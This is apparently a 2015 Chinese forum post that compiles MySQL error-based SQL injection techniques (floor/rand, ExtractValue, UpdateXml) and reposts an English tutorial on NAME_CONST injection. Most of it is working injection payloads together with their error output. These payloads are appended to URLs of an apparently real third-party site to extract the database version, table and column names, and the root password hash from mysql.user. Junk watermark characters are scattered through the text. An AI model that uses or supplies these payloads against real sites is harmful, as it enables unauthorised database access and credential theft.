|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:1 O/ y' P, T- V4 Q. t: U
首先进行正常查询: mysql> select * from article where id = 1;
# E0 T' Q* M4 \0 t- t8 N! I# v* U5 Z+—-+——-+———+* S5 W! r! i q; X- _
| id | title | content |
# B3 v9 j) d( V7 r+—-+——-+———+
2 v4 \5 G q) k' J3 h- A| 1 | test | do it |" r! ~% l1 a+ w8 V9 j4 ?) K8 j
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);* P! ~& y1 L& k# G$ ~
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。 G, T. G3 V7 v3 @1 n3 T s
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);) y2 Z% j0 k0 G, A% s4 z* d$ m1 I
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));; R+ q Z" f4 u: A8 m, s: b
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
7 k: J0 f, h- F测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
1 V! Q! l* Z0 s# W8 ?1 EERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ , C# P* P8 o* N5 h6 E$ I
" U0 a i4 a f- F" g8 D4 [
再收集:
7 u! b- b' ^/ g( I# Whttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) ; m) W* g) ~' E7 k
% ^$ o( ]+ v) k! a
Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
1 a0 g- ^: d) G% L; ?& `0 g6 ?7 u1 v5 b5 B* G
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
4 i9 J! U% e) J& O0 T0 D
7 |* y7 Y$ l( N- a+ f8 m7 {2 ^% G+ |Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ - V: b9 |3 M! Z! K5 i8 M
5 b: x" H& ]7 o7 f1 M+ W7 X
MYSQL高版本报错注入技巧-利用NAME_CONST注入
- j: w0 W0 _2 d/ _( NIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
( V+ g7 q# g/ m+ q$ {& `
; f6 F A& ~7 N$ F5 ]2 a$ W$ g) G* d. D O n. W
相关信息
" A! N8 |+ n+ X% [9 [" d- t( o" O$ m" d" ~2 h3 \: w! M
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that. X4 @- c) T' a
* A. l% o5 U9 ]! ^8 [
Code:
- I" T. v* q) o& d3 x QNAME_CONST(DATA, VALUE) ^$ S2 k' d0 p+ z
, Y, Y# U. M* |3 h4 c- z, h# gReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.* j2 f* z, Q# N1 [; d( l
! r, J# U) v' ` x7 b
SELECT NAME_CONST('TEST', 1)
7 s2 t& _% G2 f) m1 H: a/ ^9 h, W+ H
8 f! F4 \' H! V7 O% y. Z
: |5 p3 K9 Z1 q0 Q/ u0 Q! B! i+ ^) I% X|---------------|/ n3 b0 L2 ^. O8 T; n( u2 `
| TEST |
$ A8 s5 o5 T) F; H| |- s8 w# f2 p' i; {0 L/ z8 t3 v
|---------------|$ z/ r6 `7 ^2 \* I
| 1 |
0 L' C1 e) b1 Z3 P3 E% n| |
9 u! j. K- o. G+ l) i5 Y|---------------|
% C" c4 Y$ o0 b% e' i* K. _3 y }9 V6 _& ?" [ _0 R. B. [' H2 ~! i
6 {0 I, y0 v+ O c% M; o5 l b- r
1 P" _( A% Y b; i- q9 T
8 z6 q3 {& e8 ~. a! Fhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
9 h) l+ f5 g2 oIntro to MySQL Variables9 O9 A Z: y+ @0 N- a J1 J; }; M
" [$ S- p* z6 i H" k
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.& p: C6 D% v- X) r( Y
p' T9 r: N6 J# I) U! T9 q
Code:1 Z0 k% h/ ?5 D. N
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
! D3 U: |) f; J9 G: Z+ V
) f' C. }" s2 F# `0 g. S! @+ a
+ [' M" V, K+ B& T9 k" p d4 Q
8 z, r# ]0 J3 V/ Z+ \( v6 f/ Q ^/ H# A4 e1 g" h
) {# s8 \% q8 y c' r) FCode:
# F/ b% K4 V1 U# W* w0 R9 b1 |, land+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--: q6 b9 x' S6 s4 e& i" E
6 l) q. K; E# A; {
1 s; [' |" X/ w* c$ |VAR = Your MySQL variable.2 a1 L- ]+ k! u0 r
}5 {; a3 y/ P+ l: WMySQL 5.1.3 Server System Variables: R( R- I+ ` Z( Y1 \! R
* X3 ?3 p! e ]% G& q; U ]7 K% e
Let's try it out on my site..1 |! B+ f8 A3 w
* ~8 T8 _5 e% F
Code:
1 n \9 U4 Y' [$ x% Z: _; uhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--% J! t" ]2 q3 }" N% b
6 _2 S1 t, p8 q3 dErroruplicate column name '5.0.27-community-nt'5 H' Y' P/ V# M: z2 x; O1 w$ X( Z# ?
/ ]0 P$ M$ R* W! M. ~& u2 ~8 A( z& t% I) k# c& y
, `6 D/ A# y6 \) ^0 W. n
! Q. u. ^2 v' ]0 }3 b& s5 y
; p$ F# c7 b8 T5 z0 _* g' {Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...' v' {. l7 w. ^5 B. s1 Y( r! A
1 a e7 \; k/ N' tData Extraction
2 J1 T# z& h; _7 N- E8 G
+ \- \5 P( S' f; u9 q( m, p$ aCode:
h5 e& @" t% [# X8 n+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--* l0 u7 l9 Z b. | q; F
+ L1 [3 O; A4 n3 a3 r+ `0 S
8 x( o; L0 d2 I1 B% d! @) D- mWe should get a duplicate column 1 error...9 Z' M" S: L4 q9 n" y& ^
7 `; V2 O2 \! |/ E$ J& [* e
Code:1 A; p. T9 A3 S4 ~
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--; Z0 n% f# S; p, ?3 u+ Y8 {
, e0 _1 r+ Q9 |2 e+ z; X
Erroruplicate column name '16 }0 Q0 f$ ^2 |8 r: g
% j9 m# z; k1 o9 x: L
1 x I5 D; n8 N6 D. Q4 o W. F+ r5 N( ~& |, o- g/ G/ O6 L) m `
1 E- W& S: J& T7 T2 F5 I
c+ h" j( h( I+ e3 `. p
- G9 d4 e$ ~) i) ]Now let's get the tables out this bitch..
% p! c: a# X; k" Y/ k' v, E$ A( |3 Q8 ?0 K( ]% G' B2 U
Code:
# Y2 @/ N5 x; O4 S X: g' x7 m+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--8 u9 S d! K2 Z# U. @5 k8 j; H2 g, u
( N, p( ]/ A: i0 j: T; Q( o
, V! i0 l( @! Q8 c9 [
Let's see if it works here, if it does, we can go on and finish the job.
0 M: f) J/ e. |: I* Z0 q% h. Z/ }* m
Code:& i) {0 `4 ~5 j% C9 H0 c
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--/ P' |& s% U3 ^$ I0 x" T
9 R2 g/ S; h% B! I
7 K7 O( E8 e6 y. MErroruplicate column name 'com_admanage. w! z" }$ Z' _' S, h! L
) [4 [- Y O& z& x3 \7 D% o; w: \5 B. }2 e
6 q7 _7 x! s. s+ K2 C& X$ J( [- }6 z: R5 \4 \- ?( k1 Y
0 }# D8 }5 q9 p5 Y& V# m8 V6 \2 ]8 f' @2 D
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.1 k. ?, x3 }3 _# D6 T' c
, G# {6 |5 e t! Y0 LLet's get the columns out of the user table... U$ A+ i# M7 m( l' \
# d8 G0 s+ n# vCode:! x# Z1 n f' r3 n
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--' M9 @) W( ~! l8 s6 C: P
8 x( f. T- C) K; K% ?
% J" B/ l* o( R. \0 }; H# D v
So mine looks like this, and I get the duplicate column name 'Host'.2 {, b" b; b/ P# X
9 A' A8 e" Z5 N! I/ G
Code:* M4 s3 l( d9 x2 `' Z* E
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
/ k& t) a8 k6 @# I! H( y2 @
/ m6 u$ S7 ~( T4 Z/ r1 a vErroruplicate column name 'Host'
, R8 n# q c' A2 l6 u4 {( d; `% Z. {( C3 O8 i
6 E3 Z: v2 Y2 e
* @0 R, U& s, u- t$ {% r
" c9 B1 ? w& M7 h s' K8 F
! C% f: q+ ^+ }1 ^ t& U: I' C6 P
" h& N& ~7 u+ ZWoot, time to finish this bitch off.
6 X7 |8 N! G* [# b7 W* F* p
; @0 x6 I6 j1 K5 J2 \2 c* L5 ?Code:
7 e( s" q4 w: p- g9 t0 `" Q+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--- R( M! j x1 T, g( R( q, Y7 |/ @
$ P' S- ]! j0 e
/ y7 S1 K/ r/ [+ `( a. O6 a' v" D3 Q
So mine looks like this...
8 Y+ g$ T& l) O" D: @6 n) I' H
; h' p- ]5 { [1 |; {$ mCode:
( ]' I# d/ k/ J) bhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--# v7 D( I( p, q7 q: A" [) d) n
, q5 m+ I; c, p) e& OErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
9 w8 R: O; |6 {$ s* d, q6 O+ P! z; F
5 p- Q6 P5 n2 e7 q/ g7 J) c8 ]7 J( L+ L# o% h9 T+ K0 f
. L R- K: h Q. p& e
$ j- w6 e& k$ @( @; X# g
; l- f/ B7 y1 @8 x7 [( V
$ W' B# z; C1 n: oAnd there we have it, thanks for reading.
' j1 U; t0 D* C5 c. A$ T" b1 v$ O6 X: O/ J2 h
|
发表于 2015-11-11 19:03:37
收藏
支持
反对